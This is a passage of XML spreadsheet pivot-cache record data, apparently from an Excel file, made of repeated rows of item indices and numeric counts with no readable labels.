  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="778"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="778"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="778"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="778"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="780"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="780"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="780"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="780"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="780"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="780"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="780"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="780"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="780"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="780"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="780"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="780"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="780"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="780"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="781"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="781"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="781"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="781"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="781"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="781"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="781"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="781"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="781"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="781"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="781"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="781"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="781"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="781"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="782"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="782"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="782"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="782"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="782"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="782"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="782"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="782"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="782"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="782"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="782"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="782"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="7"/>
    <x v="782"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="782"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="783"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="783"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="783"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="783"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="783"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="783"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="13"/>
    <x v="783"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="783"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="783"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="783"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="783"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="783"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="783"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="783"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="2"/>
    <x v="784"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="784"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="784"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="784"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="784"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="784"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="784"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="784"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="784"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="784"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="784"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="784"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="784"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="784"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="785"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="785"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="785"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="785"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="785"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="785"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="785"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="785"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="785"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="785"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="785"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="785"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="785"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="785"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="786"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="786"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="786"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="786"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="786"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="786"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="786"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="786"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="786"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="786"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="786"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="786"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="786"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="786"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="787"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="787"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="787"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="787"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="787"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="787"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="21"/>
    <x v="787"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="6"/>
    <x v="787"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="787"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="787"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="8"/>
    <x v="787"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="787"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="787"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="787"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="788"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="788"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="788"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="788"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="788"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="788"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="788"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="788"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="788"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="788"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="788"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="788"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="788"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="788"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="789"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="789"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="789"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="789"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="9"/>
    <x v="789"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="789"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="789"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="789"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="20"/>
    <x v="789"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="789"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="789"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="789"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="789"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="789"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="790"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="790"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="5"/>
    <x v="790"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="3"/>
    <x v="790"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="7"/>
    <x v="790"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="790"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="790"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="790"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="790"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="790"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="790"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="790"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="790"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="790"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="791"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="791"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="791"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="791"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="791"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="791"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="791"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="791"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="4"/>
    <x v="791"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="4"/>
    <x v="791"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="791"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="791"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="791"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="791"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="792"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="792"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="792"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="792"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="792"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="792"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="792"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="792"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="792"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="792"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="792"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="792"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="792"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="792"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="793"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="793"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="793"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="793"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="10"/>
    <x v="793"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="29"/>
    <x v="793"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="60"/>
    <x v="793"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="56"/>
    <x v="793"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="793"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="4"/>
    <x v="793"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="793"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="793"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="793"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="3"/>
    <x v="793"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="1"/>
    <x v="671"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="794"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="794"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="794"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="794"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="9"/>
    <x v="794"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="10"/>
    <x v="794"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="20"/>
    <x v="794"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="12"/>
    <x v="794"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="4"/>
    <x v="794"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="5"/>
    <x v="794"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="241"/>
    <x v="794"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="438"/>
    <x v="794"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="794"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="794"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="432"/>
    <x v="794"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="671"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="671"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="671"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="795"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="795"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="795"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="795"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="24"/>
    <x v="795"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="43"/>
    <x v="795"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="62"/>
    <x v="795"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="795"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="795"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="795"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="795"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="795"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="21"/>
    <x v="795"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="795"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="796"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="796"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="796"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="796"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="796"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="796"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="796"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="796"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="796"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="796"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="8"/>
    <x v="796"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="7"/>
    <x v="796"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="796"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="796"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="797"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="797"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="797"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="797"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="797"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="797"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="797"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="797"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="797"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="797"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="8"/>
    <x v="797"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="8"/>
    <x v="797"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="797"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="797"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="798"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="798"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="798"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="798"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="798"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="11"/>
    <x v="798"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="58"/>
    <x v="798"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="40"/>
    <x v="798"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="798"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="798"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="26"/>
    <x v="798"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="23"/>
    <x v="798"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="798"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="798"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="4"/>
    <x v="105"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="799"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="799"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="799"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="799"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="799"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="17"/>
    <x v="799"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="46"/>
    <x v="799"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="32"/>
    <x v="799"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="799"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="799"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="50"/>
    <x v="799"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="253"/>
    <x v="799"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="799"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="799"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="800"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="800"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="800"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="800"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="800"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="800"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="800"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="800"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="800"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="800"/>
